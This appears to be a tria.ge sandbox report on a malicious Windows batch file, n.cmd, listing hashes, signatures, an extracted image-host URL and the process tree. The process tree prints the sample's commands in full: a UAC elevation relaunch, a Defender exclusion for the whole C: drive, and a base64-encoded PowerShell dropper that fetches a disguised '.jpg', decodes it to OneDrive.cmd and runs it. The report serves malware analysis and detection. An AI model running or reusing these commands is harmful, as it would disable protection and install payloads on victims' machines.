Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
66s -
max time network
20s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
31/12/2024, 20:02
Static task
static1
Behavioral task
behavioral1
Sample
n.cmd
Resource
win7-20241010-en
General
-
Target
n.cmd
-
Size
1KB
-
MD5
fa75e849a3beb187d543d9b4ae894dcc
-
SHA1
41b1a755057677bfa617c089ba6092733155a1f0
-
SHA256
ea4b2c7dbf2be84aa81e55112e40392a7c54cfabde85d3ece594d834b3c9254d
-
SHA512
eed68bf4aba6af83620591f9cdefbe5e954f5bfbb14116015c215b306ecde7e8f9736b7e886e6ecbc0a71dda8ba2a58c7f4b5b7b6354104652715052e016f91f
Malware Config
Extracted
https://i.imghippo.com/files/CFqi5277Mc.jpg
Signatures
-
pid Process 2932 powershell.exe 2692 powershell.exe 2868 powershell.exe 1928 powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2932 powershell.exe 2868 powershell.exe 2868 powershell.exe 2868 powershell.exe 2692 powershell.exe 2180 powershell.exe 1928 powershell.exe 1672 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2932 powershell.exe Token: SeDebugPrivilege 2868 powershell.exe Token: SeDebugPrivilege 2692 powershell.exe Token: SeDebugPrivilege 2180 powershell.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeDebugPrivilege 1672 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2792 wrote to memory of 2932 2792 cmd.exe 31 PID 2792 wrote to memory of 2932 2792 cmd.exe 31 PID 2792 wrote to memory of 2932 2792 cmd.exe 31 PID 2792 wrote to memory of 2868 2792 cmd.exe 32 PID 2792 wrote to memory of 2868 2792 cmd.exe 32 PID 2792 wrote to memory of 2868 2792 cmd.exe 32 PID 2868 wrote to memory of 2852 2868 powershell.exe 33 PID 2868 wrote to memory of 2852 2868 powershell.exe 33 PID 2868 wrote to memory of 2852 2868 powershell.exe 33 PID 2852 wrote to memory of 2692 2852 cmd.exe 35 PID 2852 wrote to memory of 2692 2852 cmd.exe 35 PID 2852 wrote to memory of 2692 2852 cmd.exe 35 PID 2852 wrote to memory of 2180 2852 cmd.exe 36 PID 2852 wrote to memory of 2180 2852 cmd.exe 36 PID 2852 wrote to memory of 2180 2852 cmd.exe 36 PID 2180 wrote to memory of 1928 2180 powershell.exe 37 PID 2180 wrote to memory of 1928 2180 powershell.exe 37 PID 2180 wrote to memory of 1928 2180 powershell.exe 37 PID 2852 wrote to memory of 1672 2852 cmd.exe 38 PID 2852 wrote to memory of 1672 2852 cmd.exe 38 PID 2852 wrote to memory of 1672 2852 cmd.exe 38
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\n.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -command ""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\n.cmd' -ArgumentList 'am_admin'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\n.cmd" am_admin3⤵
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h -command ""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enc JAB1AHIAbAA9ACIAaAB0AHQAcABzADoALwAvAGkALgBpAG0AZwBoAGkAcABwAG8ALgBjAG8AbQAvAGYAaQBsAGUAcwAvAEMARgBxAGkANQAyADcANwBNAGMALgBqAHAAZwAiADsAJABwAGEAdABoAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE8AbgBlAEQAcgBpAHYAZQAiADsAbQBrAGQAaQByACAAJABwAGEAdABoACAALQBGAG8AcgBjAGUAIAB8ACAATwB1AHQALQBOAHUAbABsADsAaQB3AHIAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAIgAkAHAAYQB0AGgAXABiAHUAZABkAHkALgBqAHAAZwAiADsAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABUAGUAeAB0ACgAIgAkAHAAYQB0AGgAXABPAG4AZQBEAHIAaQB2AGUALgBjAG0AZAAiACwAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABnAGMAIAAiACQAcABhAHQAaABcAGIAdQBkAGQAeQAuAGoAcABnACIAIAAtAFIAYQB3ACkAKQApACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAIgAkAHAAYQB0AGgAXABPAG4AZQBEAHIAaQB2AGUALgBjAG0AZAAiAA0ACgA=4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58a4779b5f52772608ec3bed33b8d4c5e
SHA134e7a6c28514eff4be71b51a43b35f8708064a05
SHA256220aa6a9aca3b3f53ddc97ff0af39d58ed3a0c1077d9a7c5d2973cef06ca4259
SHA5126262a917775c375c577d6981e095b610b11aa0e8341f9f46aa198be9f1a986ff57df5cbf1bb6550a8ee54c0a6ab672f0425df7e001c022e3f624378c7cc62da4